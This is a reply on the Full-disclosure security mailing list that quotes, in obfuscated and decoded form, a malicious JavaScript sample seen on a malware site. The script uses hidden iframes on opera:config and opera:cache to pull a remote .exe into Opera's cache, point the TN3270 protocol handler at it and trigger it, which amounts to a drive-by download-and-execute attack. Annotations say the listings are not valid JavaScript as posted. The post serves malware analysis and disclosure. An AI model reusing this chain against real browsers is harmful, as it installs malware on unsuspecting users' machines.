
Re: [Full-disclosure] Opera Stored Cross Site Scripting



> Just found a way to use Stefano's opera:config idea to execute code from
> remote.

Hi.

Three months ago I found on some malware site
(www.google.com.update.login.jsp.podavanda.cn) that when your User-Agent
was Opera they sent you code similar to yours, but they first
downloaded a malware .exe file to opera:cache (Opera pre-downloads
files) and later changed the tn3270:// protocol handler to this file (but without
opera:historysearch). It was probably for an older Opera version...


<!-- Malware sample quoted from the list post, in its obfuscated form; the poster's
     decoded rendering follows further down. Reproduced verbatim for analysis only. -->
<script>
// Every string literal below is padded with filler characters and decoded
// at runtime with .replace(/[filler]/g, ''); the decoded listing below gives
// the plain values.
// Stage 1: a hidden about:blank iframe whose window is then used to eval
// the stage-2 source string.
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), 
"dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), 
"bLlPaPn@kL_Bi@f@rLaBm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, ''));
document.appendChild(blank_iframe);
// Stage 2 (the string handed to eval): frames opera:config and opera:cache,
// loads the remote .exe so it lands in the cache, scrapes its cached file
// name out of the opera:cache listing, points the TN3270 handler preference
// at it and fires a tn3270:// link (see the decoded listing for the keys).
// Indicators for defenders: page frames to opera:config / opera:cache and
// scripted opera.setPreference calls on the "Network" / "TN3270 App" key.
// Note: as posted the string is not valid JS — the double-quoted literals
// inside it terminate the outer "..." string (first at createElement("iAfW...)).
blank_iframe_window.eval
        ("config_iframe = 
document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
        config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), 
"cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, 
''));\
        cache_iframe = 
document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
        app_iframe.src = 
"hUtUtUpY:y/y/UwUwYwU.@gYoyo@gYlye@.UcyoXmY.Xu@pXdYaytYeU.UlYoygXiyny.Uj@s@pX.@pXoXd@ayvYaynydXaY.yc@ny/XI@I@lU/yxXlXoUaydUe@r@.ye@xyeX".replace(/[UXYy@]/g,
 '');\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, 
'');\
                cache_iframe.onload = function ()\
                {\
                        cache = 
cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new 
RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        
opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 
4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw 
wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes 
sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, 
''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
                        app_link.click();\
                        
setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, 
''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, 
''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>


which, decoded, was something like:

<!-- The poster's decoded rendering of the sample above. The payload URL is
     defanged with "hxxp://". Reproduced verbatim for analysis only. -->
<script>
// Stage 1: hidden about:blank iframe; its window (referenced by the id
// "blank_iframe_window" — presumably resolved as a named-frame global,
// confirm) evals the stage-2 string.
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
// Note: stray ")" after "id" in the line below — the listing is not valid JS
// as posted.
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
// Stage 2: frames opera:config (config_iframe) and opera:cache (cache_iframe);
// app_iframe is a <script> element whose src is the remote .exe, used to get
// the file into Opera's cache. The cache listing is then regex-scraped for the
// cached OPR*.EXE name, the "Network" / "TN3270 App" preference is set to
// <cache dir> + that name, a tn3270:// link is clicked, and one second later
// the preference is reset to "telnet.exe~".
// Indicators for defenders: third-party frames to opera:config / opera:cache
// and scripted opera.setPreference calls on the "Network" / "TN3270 App" key.
// Also not valid JS as posted: unescaped "..." literals inside the outer
// "..." string (first at createElement("iframe")).
blank_iframe_window.eval
        ("config_iframe = document.createElement("iframe");\
        config_iframe.setAttribute("id", "config_iframe_window");\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("script");\
        cache_iframe = document.createElement("iframe");\
        app_iframe.src = 
"hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "opera:cache";\
                cache_iframe.onload = function ()\
                {\
                        cache = 
cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new 
RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference("Network","TN3270 
App",opera.getPreference("User Prefs","Cache Directory4")+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("href", "tn3270://nothing");\
                        app_link.click();\
                        
setTimeout(function(){opera.setPreference("Network","TN3270 
App","telnet.exe~")},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>

but unfortunately I don't have much time to test it...

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda@xxxxxxxxxxx
